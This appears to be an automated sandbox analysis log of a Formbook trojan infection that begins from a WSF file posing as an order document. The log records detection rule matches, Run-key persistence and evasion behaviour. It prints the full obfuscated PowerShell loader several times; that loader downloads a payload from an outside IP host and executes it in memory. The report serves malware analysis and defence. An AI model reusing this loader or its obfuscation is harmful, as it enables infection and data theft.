Source: 0000000C.00000002.3226812010.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3227790923.0000000000DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3227854878.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3228055880.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2685647197.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2568, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4320, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winWSF@21/8@4/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Ballepresseres.Ine

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2568
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4320

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine_doc_419024001904.wsf"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Offence = 1;$Rabbitriesnterimsstyre='Substrin';$Rabbitriesnterimsstyre+='g';Function adskilligt($Tegnedatabasen){$Bejig=$Tegnedatabasen.Length-$Offence;For($Rabbitries=1; $Rabbitries -lt $Bejig; $Rabbitries+=(2)){$Foundlings+=$Tegnedatabasen.$Rabbitriesnterimsstyre.Invoke($Rabbitries, $Offence);}$Foundlings;}function Apalachicola($Specieskbenes){&($milleardtedele) ($Specieskbenes);}$Folkedemokrati=adskilligt 'IMHoAzAi.l l,aO/ 5 .T0W S(,W,iUn,dgoBw,sH SNDTe .1H0P.G0,; RWPi nN6R4 ;N xM6T4K;, CrUv :R1M2G1 . 0C) BGVe,cEkBo,/,2 0,1,0 0E1L0 1, LFUiTr.enfko,xs/ 1A2U1Y.,0L ';$Godsterminalers=adskilligt 'hUPsMe rT-.AAgUe,n tG ';$Discredit=adskilligt 'Ghtt tJp :M/,/.8,7F. 1.2,1..U1 0 5S.M1A6P3C/ AKc a riiFa,t,r eA4S3,. cbhBm ';$Trlbundnes=adskilligt ' >M ';$milleardtedele=adskilligt 'TiUe.x ';$Phillipeener = adskilligt ' eScSh oS R%HaUp pEd ast aL%,\ B.aBl lHe pNrAeUsFs e r.e.s,. IfnNe K&E&M We.cAhSok .$ ';Apalachicola (adskilligt ' $MgRlFoUb aKl :MGMeBrCmKiEf.uUgBe.= (,cTmHdV /HcE .$UP hTiUl.lPiUpPe eSn.eDrA), ');Apalachicola (adskilligt 's$,g l,o b aKlv:IBAaFrFrFa m uTnMdpaZsP= $ D i sNcUr eVd iFtS.TsLpSlDiTtU( $,T.r lFb,uEn dQn eNs )S ');$Discredit=$Barramundas[0];Apalachicola (adskilligt 'p$ gEl.oKbTaNlF: o,vUerr gBe nKe.r a.l i z iUnRg =,N,eSw -.O b jTe cUtP .SFyus.tBevmD. N eEtG.sWBeFbOC.lKi eSnFt ');Apalachicola (adskilligt 'W$ o.v e.rLgMeMn.eUrJaGlDiPz iPn gP. H eNaGdAe,rDsA[ $PGEo d sPtAe.r,mBiMnUa lje,r sA]T=U$.F o.l kSeRd e,mGoOkFrPa tPi ');$Lordlily=adskilligt 'DoRv eArHgueRn.eSrKaSl iDzPiGn g .,DSoTwFn,l.oBaRd F iSlHeP( $ D i,sBc rSe.dHittK,I$,O z,oPn.iTc,), ';$Lordlily=$Germifuge[1]+$Lordlily;$Ozonic=$Germifuge[0];Apalachicola (adskilligt 'n$,g.l oSb a.la:Rf,eTrKsTk vLa n d,e n,eB=C(,T eVsSt -WPEa tIh $MO z,oEn,iWc ) ');while (!$ferskvandene) {Apalachicola (adskilligt ' $ g lVo bOaHl :FcRoum.p l e,m e,nAt eIr.= $ tJr u eB ') ;Apalachicola $Lordlily;Apalachicola (adskilligt ' S.t a,rRtM- SDlLeNe.p 4T ');Apalachicola (adskilligt ' $Fg l,o b a l :Ff,e r sTkAv a nOd.eTn e,= (TTSe.s t -LPTaLtHh C$SO zBo.nIiOcA) ') ;Apalachicola (adskilligt 'U$ g l o bHaKl : E n eMr,vSeTrTeS=R$BgSl oBb.a.lH:FT eOr m o m eMtEr.e.n.eF+,+ % $ BPa r r a m uBnAdNa s .ScKoBuCn ts ') ;$Discredit=$Barramundas[$Enervere];}Apalachicola (adskilligt 'u$SgOlWo,bCaNl : FTiTrTeFlTo c kLs ,=. UG eTtT-OC,o nRtle,nAt $FO,z o.nEiIcA ');Apalachicola (adskilligt ',$Cg l oAbpaClP: LHiPt tPe rHa t uMrIl i.s t e nE1U4N M=D [.S.y.s.tKe mr.,CIo,nTv e r,t,]F:D: F rAo.m.B a.sSeB6T4,SEt rSiSn g,( $MF iGrRePlio cSk sM)N ');Apalachicola (adskilligt 'G$Jg,lLoGbDaTl :sV eEr b iBg eVr a tHi n.gB B=A [RSWyEs.t e,ms. TLefx tC. EKn cNoOdEitnMg ],:K:KA SPC IUIT. G,eCt S tNrmi nPg (U$ LAiGtEt e rvaEt uMrRl i.sTt e ne1B4.)S ');Apalachicola (adskilligt 'N$.g.lMoVboaSl.: Kta r r i e r e.r nDeS1 5 8S= $OV eRrPbAi g e,r aQt,i,nHgN. sBuRb sHtMr iPnRgL( 3 3B6T3 9 4,,.2B5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ballepresseres.Ine && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Offence = 1;$Rabbitriesnterimsstyre='Substrin';$Rabbitriesnterimsstyre+='g';Function adskilligt($Tegnedatabasen){$Bejig=$Tegnedatabasen.Length-$Offence;For($Rabbitries=1; $Rabbitries -lt $Bejig; $Rabbitries+=(2)){$Foundlings+=$Tegnedatabasen.$Rabbitriesnterimsstyre.Invoke($Rabbitries, $Offence);}$Foundlings;}function Apalachicola($Specieskbenes){&($milleardtedele) ($Specieskbenes);}$Folkedemokrati=adskilligt 'IMHoAzAi.l l,aO/ 5 .T0W S(,W,iUn,dgoBw,sH SNDTe .1H0P.G0,; RWPi nN6R4 ;N xM6T4K;, CrUv :R1M2G1 . 0C) BGVe,cEkBo,/,2 0,1,0 0E1L0 1, LFUiTr.enfko,xs/ 1A2U1Y.,0L ';$Godsterminalers=adskilligt 'hUPsMe rT-.AAgUe,n tG ';$Discredit=adskilligt 'Ghtt tJp :M/,/.8,7F. 1.2,1..U1 0 5S.M1A6P3C/ AKc a riiFa,t,r eA4S3,. cbhBm ';$Trlbundnes=adskilligt ' >M ';$milleardtedele=adskilligt 'TiUe.x ';$Phillipeener = adskilligt ' eScSh oS R%HaUp pEd ast aL%,\ B.aBl lHe pNrAeUsFs e r.e.s,. IfnNe K&E&M We.cAhSok .$ ';Apalachicola (adskilligt ' $MgRlFoUb aKl :MGMeBrCmKiEf.uUgBe.= (,cTmHdV /HcE .$UP hTiUl.lPiUpPe eSn.eDrA), ');Apalachicola (adskilligt 's$,g l,o b aKlv:IBAaFrFrFa m uTnMdpaZsP= $ D i sNcUr eVd iFtS.TsLpSlDiTtU( $,T.r lFb,uEn dQn eNs )S ');$Discredit=$Barramundas[0];Apalachicola (adskilligt 'p$ gEl.oKbTaNlF: o,vUerr gBe nKe.r a.l i z iUnRg =,N,eSw -.O b jTe cUtP .SFyus.tBevmD. N eEtG.sWBeFbOC.lKi eSnFt ');Apalachicola (adskilligt 'W$ o.v e.rLgMeMn.eUrJaGlDiPz iPn gP. H eNaGdAe,rDsA[ $PGEo d sPtAe.r,mBiMnUa lje,r sA]T=U$.F o.l kSeRd e,mGoOkFrPa tPi ');$Lordlily=adskilligt 'DoRv eArHgueRn.eSrKaSl iDzPiGn g .,DSoTwFn,l.oBaRd F iSlHeP( $ D i,sBc rSe.dHittK,I$,O z,oPn.iTc,), ';$Lordlily=$Germifuge[1]+$Lordlily;$Ozonic=$Germifuge[0];Apalachicola (adskilligt 'n$,g.l oSb a.la:Rf,eTrKsTk vLa n d,e n,eB=C(,T eVsSt -WPEa tIh $MO z,oEn,iWc ) ');while (!$ferskvandene) {Apalachicola (adskilligt ' $ g lVo bOaHl :FcRoum.p l e,m e,nAt eIr.= $ tJr u eB ') ;Apalachicola $Lordlily;Apalachicola (adskilligt ' S.t a,rRtM- SDlLeNe.p 4T ');Apalachicola (adskilligt ' $Fg l,o b a l :Ff,e r sTkAv a nOd.eTn e,= (TTSe.s t -LPTaLtHh C$SO zBo.nIiOcA) ') ;Apalachicola (adskilligt 'U$ g l o bHaKl : E n eMr,vSeTrTeS=R$BgSl oBb.a.lH:FT eOr m o m eMtEr.e.n.eF+,+ % $ BPa r r a m uBnAdNa s .ScKoBuCn ts ') ;$Discredit=$Barramundas[$Enervere];}Apalachicola (adskilligt 'u$SgOlWo,bCaNl : FTiTrTeFlTo c kLs ,=. UG eTtT-OC,o nRtle,nAt $FO,z o.nEiIcA ');Apalachicola (adskilligt ',$Cg l oAbpaClP: LHiPt tPe rHa t uMrIl i.s t e nE1U4N M=D [.S.y.s.tKe mr.,CIo,nTv e r,t,]F:D: F rAo.m.B a.sSeB6T4,SEt rSiSn g,( $MF iGrRePlio cSk sM)N ');Apalachicola (adskilligt 'G$Jg,lLoGbDaTl :sV eEr b iBg eVr a tHi n.gB B=A [RSWyEs.t e,ms. TLefx tC. EKn cNoOdEitnMg ],:K:KA SPC IUIT. G,eCt S tNrmi nPg (U$ LAiGtEt e rvaEt uMrRl i.sTt e ne1B4.)S ');Apalachicola (adskilligt 'N$.g.lMoVboaSl.: Kta r r i e r e.r nDeS1 5 8S= $OV eRrPbAi g e,r aQt,i,nHgN. sBuRb sHtMr iPnRgL( 3 3B6T3 9 4,,.2B5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ballepresseres.Ine && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Offence = 1;$Rabbitriesnterimsstyre='Substrin';$Rabbitriesnterimsstyre+='g';Function adskilligt($Tegnedatabasen){$Bejig=$Tegnedatabasen.Length-$Offence;For($Rabbitries=1; $Rabbitries -lt $Bejig; $Rabbitries+=(2)){$Foundlings+=$Tegnedatabasen.$Rabbitriesnterimsstyre.Invoke($Rabbitries, $Offence);}$Foundlings;}function Apalachicola($Specieskbenes){&($milleardtedele) ($Specieskbenes);}$Folkedemokrati=adskilligt 'IMHoAzAi.l l,aO/ 5 .T0W S(,W,iUn,dgoBw,sH SNDTe .1H0P.G0,; RWPi nN6R4 ;N xM6T4K;, CrUv :R1M2G1 . 0C) BGVe,cEkBo,/,2 0,1,0 0E1L0 1, LFUiTr.enfko,xs/ 1A2U1Y.,0L ';$Godsterminalers=adskilligt 'hUPsMe rT-.AAgUe,n tG ';$Discredit=adskilligt 'Ghtt tJp :M/,/.8,7F. 1.2,1..U1 0 5S.M1A6P3C/ AKc a riiFa,t,r eA4S3,. cbhBm ';$Trlbundnes=adskilligt ' >M ';$milleardtedele=adskilligt 'TiUe.x ';$Phillipeener = adskilligt ' eScSh oS R%HaUp pEd ast aL%,\ B.aBl lHe pNrAeUsFs e r.e.s,. IfnNe K&E&M We.cAhSok .$ ';Apalachicola (adskilligt ' $MgRlFoUb aKl :MGMeBrCmKiEf.uUgBe.= (,cTmHdV /HcE .$UP hTiUl.lPiUpPe eSn.eDrA), ');Apalachicola (adskilligt 's$,g l,o b aKlv:IBAaFrFrFa m uTnMdpaZsP= $ D i sNcUr eVd iFtS.TsLpSlDiTtU( $,T.r lFb,uEn dQn eNs )S ');$Discredit=$Barramundas[0];Apalachicola (adskilligt 'p$ gEl.oKbTaNlF: o,vUerr gBe nKe.r a.l i z iUnRg =,N,eSw -.O b jTe cUtP .SFyus.tBevmD. N eEtG.sWBeFbOC.lKi eSnFt ');Apalachicola (adskilligt 'W$ o.v e.rLgMeMn.eUrJaGlDiPz iPn gP. H eNaGdAe,rDsA[ $PGEo d sPtAe.r,mBiMnUa lje,r sA]T=U$.F o.l kSeRd e,mGoOkFrPa tPi ');$Lordlily=adskilligt 'DoRv eArHgueRn.eSrKaSl iDzPiGn g .,DSoTwFn,l.oBaRd F iSlHeP( $ D i,sBc rSe.dHittK,I$,O z,oPn.iTc,), ';$Lordlily=$Germifuge[1]+$Lordlily;$Ozonic=$Germifuge[0];Apalachicola (adskilligt 'n$,g.l oSb a.la:Rf,eTrKsTk vLa n d,e n,eB=C(,T eVsSt -WPEa tIh $MO z,oEn,iWc ) ');while (!$ferskvandene) {Apalachicola (adskilligt ' $ g lVo bOaHl :FcRoum.p l e,m e,nAt eIr.= $ tJr u eB ') ;Apalachicola $Lordlily;Apalachicola (adskilligt ' S.t a,rRtM- SDlLeNe.p 4T ');Apalachicola (adskilligt ' $Fg l,o b a l :Ff,e r sTkAv a nOd.eTn e,= (TTSe.s t -LPTaLtHh C$SO zBo.nIiOcA) ') ;Apalachicola (adskilligt 'U$ g l o bHaKl : E n eMr,vSeTrTeS=R$BgSl oBb.a.lH:FT eOr m o m eMtEr.e.n.eF+,+ % $ BPa r r a m uBnAdNa s .ScKoBuCn ts ') ;$Discredit=$Barramundas[$Enervere];}Apalachicola (adskilligt 'u$SgOlWo,bCaNl : FTiTrTeFlTo c kLs ,=. UG eTtT-OC,o nRtle,nAt $FO,z o.nEiIcA ');Apalachicola (adskilligt ',$Cg l oAbpaClP: LHiPt tPe rHa t uMrIl i.s t e nE1U4N M=D [.S.y.s.tKe mr.,CIo,nTv e r,t,]F:D: F rAo.m.B a.sSeB6T4,SEt rSiSn g,( $MF iGrRePlio cSk sM)N ');Apalachicola (adskilligt 'G$Jg,lLoGbDaTl :sV eEr b iBg eVr a tHi n.gB B=A [RSWyEs.t e,ms. TLefx tC. EKn cNoOdEitnMg ],:K:KA SPC IUIT. G,eCt S tNrmi nPg (U$ LAiGtEt e rvaEt uMrRl i.sTt e ne1B4.)S ');Apalachicola (adskilligt 'N$.g.lMoVboaSl.: Kta r r i e r e.r nDeS1 5 8S= $OV eRrPbAi g e,r aQt,i,nHgN. sBuRb sHtMr iPnRgL( 3 3B6T3 9 4,,.2B5	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ballepresseres.Ine && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Offence = 1;$Rabbitriesnterimsstyre='Substrin';$Rabbitriesnterimsstyre+='g';Function adskilligt($Tegnedatabasen){$Bejig=$Tegnedatabasen.Length-$Offence;For($Rabbitries=1; $Rabbitries -lt $Bejig; $Rabbitries+=(2)){$Foundlings+=$Tegnedatabasen.$Rabbitriesnterimsstyre.Invoke($Rabbitries, $Offence);}$Foundlings;}function Apalachicola($Specieskbenes){&($milleardtedele) ($Specieskbenes);}$Folkedemokrati=adskilligt 'IMHoAzAi.l l,aO/ 5 .T0W S(,W,iUn,dgoBw,sH SNDTe .1H0P.G0,; RWPi nN6R4 ;N xM6T4K;, CrUv :R1M2G1 . 0C) BGVe,cEkBo,/,2 0,1,0 0E1L0 1, LFUiTr.enfko,xs/ 1A2U1Y.,0L ';$Godsterminalers=adskilligt 'hUPsMe rT-.AAgUe,n tG ';$Discredit=adskilligt 'Ghtt tJp :M/,/.8,7F. 1.2,1..U1 0 5S.M1A6P3C/ AKc a riiFa,t,r eA4S3,. cbhBm ';$Trlbundnes=adskilligt ' >M ';$milleardtedele=adskilligt 'TiUe.x ';$Phillipeener = adskilligt ' eScSh oS R%HaUp pEd ast aL%,\ B.aBl lHe pNrAeUsFs e r.e.s,. IfnNe K&E&M We.cAhSok .$ ';Apalachicola (adskilligt ' $MgRlFoUb aKl :MGMeBrCmKiEf.uUgBe.= (,cTmHdV /HcE .$UP hTiUl.lPiUpPe eSn.eDrA), ');Apalachicola (adskilligt 's$,g l,o b aKlv:IBAaFrFrFa m uTnMdpaZsP= $ D i sNcUr eVd iFtS.TsLpSlDiTtU( $,T.r lFb,uEn dQn eNs )S ');$Discredit=$Barramundas[0];Apalachicola (adskilligt 'p$ gEl.oKbTaNlF: o,vUerr gBe nKe.r a.l i z iUnRg =,N,eSw -.O b jTe cUtP .SFyus.tBevmD. N eEtG.sWBeFbOC.lKi eSnFt ');Apalachicola (adskilligt 'W$ o.v e.rLgMeMn.eUrJaGlDiPz iPn gP. H eNaGdAe,rDsA[ $PGEo d sPtAe.r,mBiMnUa lje,r sA]T=U$.F o.l kSeRd e,mGoOkFrPa tPi ');$Lordlily=adskilligt 'DoRv eArHgueRn.eSrKaSl iDzPiGn g .,DSoTwFn,l.oBaRd F iSlHeP( $ D i,sBc rSe.dHittK,I$,O z,oPn.iTc,), ';$Lordlily=$Germifuge[1]+$Lordlily;$Ozonic=$Germifuge[0];Apalachicola (adskilligt 'n$,g.l oSb a.la:Rf,eTrKsTk vLa n d,e n,eB=C(,T eVsSt -WPEa tIh $MO z,oEn,iWc ) ');while (!$ferskvandene) {Apalachicola (adskilligt ' $ g lVo bOaHl :FcRoum.p l e,m e,nAt eIr.= $ tJr u eB ') ;Apalachicola $Lordlily;Apalachicola (adskilligt ' S.t a,rRtM- SDlLeNe.p 4T ');Apalachicola (adskilligt ' $Fg l,o b a l :Ff,e r sTkAv a nOd.eTn e,= (TTSe.s t -LPTaLtHh C$SO zBo.nIiOcA) ') ;Apalachicola (adskilligt 'U$ g l o bHaKl : E n eMr,vSeTrTeS=R$BgSl oBb.a.lH:FT eOr m o m eMtEr.e.n.eF+,+ % $ BPa r r a m uBnAdNa s .ScKoBuCn ts ') ;$Discredit=$Barramundas[$Enervere];}Apalachicola (adskilligt 'u$SgOlWo,bCaNl : FTiTrTeFlTo c kLs ,=. UG eTtT-OC,o nRtle,nAt $FO,z o.nEiIcA ');Apalachicola (adskilligt ',$Cg l oAbpaClP: LHiPt tPe rHa t uMrIl i.s t e nE1U4N M=D [.S.y.s.tKe mr.,CIo,nTv e r,t,]F:D: F rAo.m.B a.sSeB6T4,SEt rSiSn g,( $MF iGrRePlio cSk sM)N ');Apalachicola (adskilligt 'G$Jg,lLoGbDaTl :sV eEr b iBg eVr a tHi n.gB B=A [RSWyEs.t e,ms. TLefx tC. EKn cNoOdEitnMg ],:K:KA SPC IUIT. G,eCt S tNrmi nPg (U$ LAiGtEt e rvaEt uMrRl i.sTt e ne1B4.)S ');Apalachicola (adskilligt 'N$.g.lMoVboaSl.: Kta r r i e r e.r nDeS1 5 8S= $OV eRrPbAi g e,r aQt,i,nHgN. sBuRb sHtMr iPnRgL( 3 3B6T3 9 4,,.2B5	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ballepresseres.Ine && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2407323813.0000000008C08000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2407168182.0000000008350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2391197450.0000000005962000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2529825040.000001AE40151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Firelocks)$global:Verbigerating = [System.Text.Encoding]::ASCII.GetString($Litteraturlisten14)$global:Karriererne158=$Verbigerating.substring(336394,25080)<#Massedness Stowing restau
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Jeannys $Programmable $Teaktrslisterne), (Natriumets @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Mispoints = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Skjules)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Tipvognstoge, $false).DefineType($Paaskn, $Predat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Firelocks)$global:Verbigerating = [System.Text.Encoding]::ASCII.GetString($Litteraturlisten14)$global:Karriererne158=$Verbigerating.substring(336394,25080)<#Massedness Stowing restau

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F309E8 push E85E515Dh; ret	2_2_00007FF848F309F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00AF3AC3 push ebx; retf	5_2_00AF3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_072808C2 push eax; mov dword ptr [esp], ecx	5_2_07280AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07280AB9 push eax; mov dword ptr [esp], ecx	5_2_07280AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2070B008 push es; iretd	9_2_2070B009
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2070225F pushad ; ret	9_2_207027F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207027FA pushad ; ret	9_2_207027F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2070283D push eax; iretd	9_2_20702858
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_20709939 push es; iretd	9_2_20709940
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_207309AD push ecx; mov dword ptr [esp], ecx	9_2_207309B6

Source: C:\Windows\SysWOW64\AtBroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3FZ4SBL			Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3FZ4SBL			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4460	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5461	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7853	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1939	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3624	Thread sleep count: 7853 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5008	Thread sleep count: 1939 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6400	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
